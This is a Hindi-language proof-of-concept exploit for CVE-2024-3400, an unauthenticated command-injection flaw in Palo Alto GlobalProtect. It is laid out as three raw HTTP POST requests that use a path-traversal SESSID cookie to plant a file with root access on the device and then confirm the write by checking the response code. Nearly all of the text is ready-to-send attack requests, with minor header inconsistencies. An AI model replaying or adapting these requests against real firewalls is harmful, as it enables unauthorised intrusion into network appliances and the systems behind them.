
CVE-2024-3400 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण चरण, Palo Alto GlobalProtect में क्राफ्टेड कुकी और फॉर्म पैरामीटर के माध्यम से अनप्रमाणित कमांड इंजेक्शन का प्रदर्शन।
#चरण :
#1. जाँच करें कि डिवाइस पर फ़ाइल (0xr2r.txt) मौजूद है या नहीं, नीचे दिए गए GET अनुरोध को चलाकर या हम इसे खोलकर भी सत्यापित कर सकते हैं
https://domain.com/global-protect/portal/images/0xr2r.txt ब्राउज़र में URL यदि आपको 404 प्रतिक्रिया मिलती है तो इसका मतलब है कि फ़ाइल मौजूद नहीं है।
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
#2. अब डिवाइस पर फ़ाइल (0xr2r.txt) डालने के लिए नीचे दिया गया POST अनुरोध चलाएँ। यह डिवाइस पर दिए गए पथ पर रूट एक्सेस के साथ फ़ाइल बनाएगा।
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r
#3. अब यदि आप फिर से फ़ाइलों तक पहुँचने का प्रयास करते हैं तो आपको 404 के बजाय 403 प्राप्त होना चाहिए। यह साबित करता है कि फ़ाइल (0xr2r.txt) डिवाइस पर रूट एक्सेस के साथ मौजूद है।
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: domain.com
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/0xr2r.txt
Content-Type: application/x-www-form-urlencoded
Content-Length: 170
user=0xr2r&portal=0xr2r&authcookie=284ad748-7ce2-4753-a39a-aa381b18cf70&domain=0xr2r&computer=0xr2r&client-ip=0xr2r&client-ipv6=0xr2r&md5-sum=0xr2r&gwHipReportCheck=0xr2r